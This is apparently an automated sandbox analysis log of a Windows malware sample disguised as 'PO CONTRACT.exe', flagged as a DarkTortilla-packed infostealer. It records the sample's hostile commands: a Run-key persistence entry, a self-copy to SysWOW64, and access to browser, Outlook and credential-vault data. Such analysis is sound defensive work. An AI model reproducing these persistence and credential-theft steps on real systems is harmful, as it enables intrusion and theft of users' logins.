                    Source: PO CONTRACT.exe, 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHPzFG9.dll" vs PO CONTRACT.exe
                    Source: PO CONTRACT.exe, 00000000.00000000.35638092872.0000000000A30000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDDI.exeD vs PO CONTRACT.exe
                    Source: PO CONTRACT.exe, 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHPzFG9.dll" vs PO CONTRACT.exe
                    Source: PO CONTRACT.exeBinary or memory string: OriginalFilenameDDI.exeD vs PO CONTRACT.exe
                    Source: PO CONTRACT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                    Source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.5747378.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.570c1d8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.570c1d8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PO CONTRACT.exe, q3.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, iW8xDDFHHu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, iW8xDDFHHu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, iW8xDDFHHu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, iW8xDDFHHu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, FZ6.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, FZ6.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb##
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/10@0/1
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO CONTRACT.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:304:WilStaging_02
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:304:WilStaging_02
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2540:304:WilStaging_02
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:304:WilStaging_02
                    Source: PO CONTRACT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PO CONTRACT.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PO CONTRACT.exeVirustotal: Detection: 34%
                    Source: PO CONTRACT.exeReversingLabs: Detection: 47%
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeFile read: C:\Users\user\Desktop\PO CONTRACT.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PO CONTRACT.exe "C:\Users\user\Desktop\PO CONTRACT.exe"
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\SOA.exe "C:\Windows\SysWOW64\SOA.exe"
                    Source: C:\Windows\SysWOW64\SOA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\SOA.exe "C:\Windows\SysWOW64\SOA.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: PO CONTRACT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PO CONTRACT.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: PO CONTRACT.exeStatic file information: File size 2417152 > 1048576
                    Source: PO CONTRACT.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24da00
                    Source: PO CONTRACT.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
                    Source: Binary string: indows\Microsoft.VisualBasic.pdbpdbsic.pdb source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: lBasic.pdb source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: InstallUtil.pdb source: GUIVTme.exe, 0000000D.00000000.37571661992.0000000000452000.00000002.00000001.01000000.0000000A.sdmp, GUIVTme.exe.11.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb## source: PO CONTRACT.exe, 00000000.00000002.35998232560.0000000001223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: til.pdb source: InstallUtil.exe, 0000000B.00000002.40726882971.0000000006479000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fe0f9a.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.401c15a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.57d1038.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4044ef2.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.4009d32.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.57d1038.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.6900000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.6900000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.3fceb62.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SOA.exe.3fa5dca.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO CONTRACT.exe.5747378.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36000430187.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.37452537402.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_02D66D72 push edx; ret 0_2_02D66D73
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_056B8968 push es; iretd 0_2_056BA27C
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_056B3ADC push es; ret 0_2_056B3AE0
